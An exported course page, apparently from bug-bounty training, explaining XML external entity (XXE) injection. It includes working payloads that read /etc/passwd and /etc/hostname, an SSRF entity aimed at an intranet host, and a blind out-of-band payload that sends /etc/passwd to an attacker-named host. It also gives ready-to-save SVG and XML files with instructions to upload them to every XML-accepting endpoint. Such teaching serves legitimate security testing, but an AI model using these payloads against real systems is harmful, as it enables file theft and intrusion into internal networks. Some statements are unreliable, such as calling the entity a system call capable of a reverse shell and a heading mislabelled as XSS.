<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>XXE</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code-wrap {
	white-space: pre-wrap;
	word-break: break-all;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark {
	text-decoration: none;
	max-height: 8em;
	padding: 0;
	display: flex;
	width: 100%;
	align-items: stretch;
}

.bookmark-title {
	font-size: 0.85em;
	overflow: hidden;
	text-overflow: ellipsis;
	height: 1.75em;
	white-space: nowrap;
}

.bookmark-text {
	display: flex;
	flex-direction: column;
}

.bookmark-info {
	flex: 4 1 180px;
	padding: 12px 14px 14px;
	display: flex;
	flex-direction: column;
	justify-content: space-between;
}

.bookmark-image {
	width: 33%;
	flex: 1 1 180px;
	display: block;
	position: relative;
	object-fit: cover;
	border-radius: 1px;
}

.bookmark-description {
	color: rgba(55, 53, 47, 0.6);
	font-size: 0.75em;
	overflow: hidden;
	max-height: 4.5em;
	word-break: break-word;
}

.bookmark-href {
	font-size: 0.75em;
	margin-top: 0.25em;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif; }
.mono { font-family: iawriter-mono, Nitti, Menlo, Courier, monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, "SFMono-Regular", Consolas, "Liberation Mono", Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, YuMincho, "Yu Mincho", "Hiragino Mincho ProN", "Hiragino Mincho Pro", "Songti TC", "Songti SC", "SimSun", "Nanum Myeongjo", NanumMyeongjo, Batang, serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, iawriter-mono, Nitti, Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}
.select-value-color-default { background-color: rgba(206,205,202,0.5); }
.select-value-color-gray { background-color: rgba(155,154,151, 0.4); }
.select-value-color-brown { background-color: rgba(140,46,0,0.2); }
.select-value-color-orange { background-color: rgba(245,93,0,0.2); }
.select-value-color-yellow { background-color: rgba(233,168,0,0.2); }
.select-value-color-green { background-color: rgba(0,135,107,0.2); }
.select-value-color-blue { background-color: rgba(0,120,223,0.2); }
.select-value-color-purple { background-color: rgba(103,36,222,0.2); }
.select-value-color-pink { background-color: rgba(221,0,129,0.2); }
.select-value-color-red { background-color: rgba(255,0,26,0.2); }

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="dbfdda26-a21f-48c7-b105-6cb7693481bb" class="page sans"><header><div class="page-header-icon undefined"><span class="icon">💚</span></div><h1 class="page-title">XXE</h1></header><div class="page-body"><nav id="44c611f6-c0d9-4853-ae4e-cd82370f4cc0" class="block-color-gray table_of_contents"><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#eb95b75e-c72b-452e-8050-1e4dc69abf14">What is it</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#5b3ae12e-8805-411a-bd09-b992adbba3c6">Types of XSS attacks</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#435a0abc-cff9-4805-8174-54b416a9b03c">XXE To retrieve files</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#2ea79eef-0e37-4792-8de7-4fbc9fe746dc">XXE Into SSRF</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#d7d3ebaa-b368-4290-9a12-2c64db0019b5">Blind XXE</a></div><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#b0b5ef53-0fa8-49ae-b574-4c66ebaad0fd">Attack strategy</a></div></nav><h1 id="eb95b75e-c72b-452e-8050-1e4dc69abf14" class="">What is it</h1><p id="61624ec2-d7d4-4d7f-a67d-89ba1f1a9bbf" class="">XXE = XML eXternal Entities</p><p id="79896628-2eb7-458e-8985-1983cb174934" class="">XXE can occur when XML documents get parsed. We traditionally think of XXE vulnerabilities as uploading an XML file that includes an external entity, an example of this would be:</p><pre id="ca5163a1-40e4-4b28-a9e8-4b5b456c44e4" class="code"><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY &gt;&lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot; &gt;]&gt;
&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</code></pre><p id="331e2aa2-f200-4a05-a5b4-11717b814b0a" class="">We might be able to upload this file if we save it as .xml into an application that process XML files but what some hunters don&#x27;t know is that some other file types consist of XML files. In this course we will cover two types of XXE attacks but can you think of any more after reading this?</p><h1 id="5b3ae12e-8805-411a-bd09-b992adbba3c6" class="">Types of XSS attacks</h1><p id="9f4f3e27-4ea8-44ae-a80b-22b437ac34bb" class="">XXE can be abused to perform several types of attacks. It can even be chained into things like SSRF.</p><p id="c92a4433-8d6e-4471-a6d3-ef9294caa9eb" class="">In this chapter we will mostly take a look at:</p><ul id="4eecee44-10e9-4a87-8ddf-52db03fc834a" class="bulleted-list"><li>XXE to retrieve files</li></ul><ul id="61d4ca33-2019-4809-968f-da85ef9f1b24" class="bulleted-list"><li>XXE to perform SSRF</li></ul><ul id="3ec9dbf0-ff11-4f04-9a88-42e9c64469cb" class="bulleted-list"><li>Blind XXE</li></ul><h2 id="435a0abc-cff9-4805-8174-54b416a9b03c" class="">XXE To retrieve files</h2><pre id="323f906f-aab4-4f9e-a092-666caf122312" class="code"><code>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt; ]&gt;
&lt;product&gt;&amp;xxe;&lt;/product&gt;
&lt;adress&gt;&amp;xxe;&lt;/adress&gt;</code></pre><p id="395bf7e2-306a-43e4-bc8d-9d25b730f2b8" class="">In this example we first define the document type and in there we define a new Entity called &quot;XXE&quot;. This entity is made to execute a system call. This can be anything like ls, a reverse shell or in this case a file inclusion. It will grab the /etc/passwd file.</p><pre id="042c0960-3df0-4483-b190-75b9df501bda" class="code"><code>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt; ]&gt;</code></pre><p id="9b4d893e-d81c-4ad8-8baa-d19a9241e63f" class="">Next we will display that entity xxe into every possible field of our XML file.<span style="border-bottom:0.05em solid"><strong> It&#x27;s very important to insert your XXE entity into every single XML element. Any of them can be vulnerable as the developer has to filter ALL the fields indivually.</strong></span></p><h2 id="2ea79eef-0e37-4792-8de7-4fbc9fe746dc" class="">XXE Into SSRF</h2><pre id="318b1cec-cf61-4f28-8185-0a76d4d1f2d1" class="code"><code>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM
&quot;http://intranet.cheeseshop.com&quot;&gt; ]&gt;</code></pre><p id="b8436e62-ac75-4c2e-a910-a767301c86e7" class="">In our previous example we made a SYSTEM call to include a file, in this example we make the same SYSTEM call to an HTTP endpoint of an internal webserver of which we should not see the contents from outside. To learn more about SSRF check out that chapter.</p><h2 id="d7d3ebaa-b368-4290-9a12-2c64db0019b5" class="">Blind XXE</h2><p id="6760a67b-9276-47a2-8cb9-e2ba78b51aea" class="">The majority of XXE vulnerabilities in the wild will be blind XXE attacks. To detect these we can use an out of band webserver that we host ourselves and make the target do a callback to our server using the same technique we used previously in XXE into SSRF.</p><pre id="22d831b7-b7ae-4dae-93d4-a8a936bd5ed1" class="code"><code>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;http://f2g9j7hhkax.web-attacker.com&quot;&gt;
]&gt;</code></pre><p id="915a0ca4-4d82-4b42-bfdb-00b4eb5edddd" class="">If we detect blind XXE, we can exfiltrate data via OAST</p><pre id="73cf1a57-a220-452f-a0db-0b4efa198d68" class="code"><code>&lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;
&lt;!ENTITY % eval &quot;&lt;!ENTITY &amp;#x25; exfiltrate SYSTEM &#x27;http://webattacker.com/?x=%file;&#x27;&gt;&quot;&gt;
%eval;
%exfiltrate;</code></pre><p id="9dc76323-2471-419d-97af-1d163372ced3" class="">Our first entity will grab the data file /etc/passwd and our second entity will make a callback to our server with the contents of the /etc/passwd file in a get parameter.</p><h1 id="b0b5ef53-0fa8-49ae-b574-4c66ebaad0fd" class="">Attack strategy</h1><p id="42c9fcaa-bd37-4173-a3b7-132927602f31" class="">Our attack strategy will consist of trying to upload a file that will test for XXE on every entry point where an XML is processed. This can be in XML format bit also in SVG or DOCX/XLSX files. Our attack vectors will focus on trying to the /etc/hostname file. There are many other things we can do with XXE for example when we are testing on a windows server, we need to make sure to include a windows file instead of the /etc/hostname file.</p><p id="313e688a-48bb-4066-a283-3404d1c705f4" class="">Save the following files on your pc:</p><pre id="21e0ffc6-70b8-43c4-850d-b91ad251ebf0" class="code"><code>&lt;?xml version=&quot;1.0&quot; standalone=&quot;yes&quot;?&gt;
&lt;!DOCTYPE test [ &lt;!ENTITY xxe SYSTEM &quot;file:///etc/hostname&quot; &gt; ]&gt;
&lt;svg width=&quot;128px&quot; height=&quot;128px&quot; xmlns=&quot;http://www.w3.org/2000/svg&quot; xmlns:xlink=&quot;http://www.w3.org/1999/xlink&quot; version=&quot;1.1&quot;&gt;
&lt;text font-size=&quot;16&quot; x=&quot;0&quot; y=&quot;16&quot;&gt;&amp;xxe;&lt;/text&gt;
&lt;/svg&gt;</code></pre><pre id="f7a80422-adf6-4e32-9c1e-ade6e5df6f2d" class="code"><code>&lt;?xml  version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE foo [
   &lt;!ELEMENT foo ANY &gt;
   &lt;!ENTITY xxe SYSTEM  &quot;file:///etc/hostname&quot; &gt;]&gt;
&lt;foo&gt;&amp;xxe;&lt;/foo&gt;</code></pre><p id="d358f811-bc24-43dd-a8ed-e3e5eebe5c2e" class="">For docx/xlsx payload please check out </p><figure id="605ac377-2663-4449-8d3e-913b635454a3"><a href="https://doddsecurity.com/312/xml-external-entity-injection-xxe-in-opencats-applicant-tracking-system/" class="bookmark source"><div class="bookmark-info"><div class="bookmark-text"><div class="bookmark-title">XML External Entity Injection (XXE) in OpenCats Applicant Tracking System - Dodd Security</div><div class="bookmark-description">Vendor&#x27;s Vulnerability Announcement CVE-2019-13358 Internet Facing OpenCats: Google Dork OpenCats is an open-sourced applicant tracking system that is used to track job applicants. Versions before 0.9.4-3 suffer from a XML External Entity Injection vulnerability that allows unauthenticated job applicants to read files on the underlying operating system after uploading a resume with a docx or [...]</div></div><div class="bookmark-href"><img src="https://doddsecurity.com/favicon.ico" class="icon bookmark-icon"/>https://doddsecurity.com/312/xml-external-entity-injection-xxe-in-opencats-applicant-tracking-system/</div></div><img src="https://doddsecurity.com/wp-content/uploads/2019/07/opencats.png" class="bookmark-image"/></a></figure><p id="a532f2b5-d539-4a0b-a8f1-ae623cbe7995" class="">As you can see, we are fetching the file /ect/hostname and putting it in an &quot;entity&quot; with the name &quot;xxe&quot;:</p><pre id="d682f06e-41cd-424a-a59d-f17d654fc8ff" class="code"><code>&lt;!ENTITY xxe SYSTEM  &quot;file:///etc/hostname&quot; &gt;]&gt;</code></pre><p id="ab1488e1-11b6-4c8e-8dd4-ac710b7528fc" class="">Later on we call that entity in the XML document to display it</p><pre id="ee0f036b-f45a-482a-9fc0-c8bbbbcecbf2" class="code"><code>&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
&lt;text font-size=&quot;16&quot; x=&quot;0&quot; y=&quot;16&quot;&gt;&amp;xxe;&lt;/text&gt;</code></pre><p id="3dd59fe3-d04f-4895-a7d3-21e0b92eb148" class="">Now that we created these files, try to upload them everywhere you can such as:</p><ul id="6ddb86b4-2cb9-4b2a-b301-ae1b6b51dc69" class="bulleted-list"><li>profile pictures (.svg)</li></ul><ul id="456582c5-2446-4e50-951b-6321029c9ce8" class="bulleted-list"><li>banners (.svg)</li></ul><ul id="cf807a42-29d0-4b20-8b52-57889ea97276" class="bulleted-list"><li>photo albums (.svg)</li></ul><ul id="70e7e97c-3e6d-42f1-b5ff-cb3ab23fcdfd" class="bulleted-list"><li>XML imports (.xml)</li></ul><ul id="3ad736e0-f6c4-45f8-a98c-9d955dba6338" class="bulleted-list"><li>DOCX/XLSX imports (.docx/.xlsx)</li></ul><ul id="1240fcc2-49cf-42ec-b86e-e20a74ac28ec" class="bulleted-list"><li>SOAP requests</li></ul><ul id="f5eebd98-bf22-4bd1-90a0-f9c693dcf0ad" class="bulleted-list"><li>...</li></ul><p id="35336191-cad8-4081-97a0-7f5e338b36d6" class="">The behaviour we are looking for is that the system will grab the /etc/hostname and will print the value in the location that we expect our process document would be. </p><p id="0b0257c2-a92a-4354-aebb-fab45b2d70ec" class="">As for Blind XXE, we need to make sure to test with an attack vector that makes a callback to our own webserver.</p><p id="aa47017c-4d58-4f98-87ef-12f686908d18" class="">
</p></div></article><a href="https://hide01.ir"><span class="icon">🎩</span>Hide01</a></body></html>
